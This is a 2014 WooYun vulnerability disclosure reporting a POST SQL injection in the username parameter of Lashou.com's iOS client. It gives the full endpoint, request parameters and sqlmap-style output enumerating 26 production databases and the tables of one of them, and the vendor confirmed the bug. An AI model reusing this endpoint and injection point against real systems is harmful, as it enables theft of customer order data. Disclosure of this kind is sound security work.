拉手网IOS客户端SQL注入一枚多库

漏洞详情

披露状态:

2014-02-19: 细节已通知厂商并且等待厂商处理中
2014-02-20: 厂商已经确认,细节仅向厂商公开
2014-03-02: 细节向核心白帽子及相关领域专家公开
2014-03-12: 细节向普通白帽子公开
2014-03-22: 细节向实习白帽子公开
2014-04-05: 细节向公众公开

简要描述:

POST SQL注入一枚多库 大量敏感信息

详细说明:

URL:

http://go.client.lashou.com:80/index.php/Seven/mylist/cancel_order/STID/groupbuy_4.82_ipad_10000_c9ea79576bf848d860b1a9820e286df4fd483e88_43746679_2419_iPad4,1_7.0.4_43D1A5CC-C1A4-4EAA-A833-E376C5849BAD_c9ea79576bf848d860b1a9820e286df4fd483e88
POST:
password=5416d7***855e84&username=niliu&time=1392819709&sign=84badb52147fcf003d33e5a939e9&trade_no=793411522a66e2519





username参数过滤不严存在注入



1.png





26个数据库

2.png







available databases [26]:
[*] `EN
[*] `hotel
[*] `lashoblog`
[*] `lashou_sem`
[*] `lashou_ssb
[*] `lgolR`
[*] `nyqrlB:`
[*] `odntqm`
[*] `smgu:C#
[*] `tgonUW
[*] `tipt
[*] adbrgss
[*] dataminihg
[*] dating
[*] game_togk
[*] house
[*] hui
[*] information_schema
[*] lashou_acriviry
[*] lashou_dianping
[*] lashou_hlpel
[*] lashou_huk
[*] lashou_jd
[*] lashou_mall
[*] lodpo
[*] mylpp





Database: lashou_mall
[23 tables]
+-----------------------------+
| mall_activity_category |
| mall_brand |
| mall_brand_category |
| mall_brand_category_2 |
| mall_brand_goods |
| mall_brand_merchant |
| mall_brand_promotion |
| mall_brand_tuangou_cat |
| mall_category |
| mall_category_goods |
| mall_category_goods_2 |
| mall_category_merchant |
| mall_category_merchant_2 |
| mall_index_category_brand |
| mall_index_category_brand_2 |
| mall_index_goods |
| mall_index_publish |
| mall_online_cat |
| online_index_log |
| tuangou_mall_shop |
| tuangou_mall_sp_cat |
| up_goods_online |
| up_sgoods_online |
+-----------------------------+





漏洞证明:

3.png





一号店,京东,淘宝等各种订单数据



4.png

修复方案:

#过滤相关参数



#求20rank!

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-02-20 09:42

厂商回复:

已经告知开发,紧急处理,感谢

最新状态:

暂无


漏洞评价: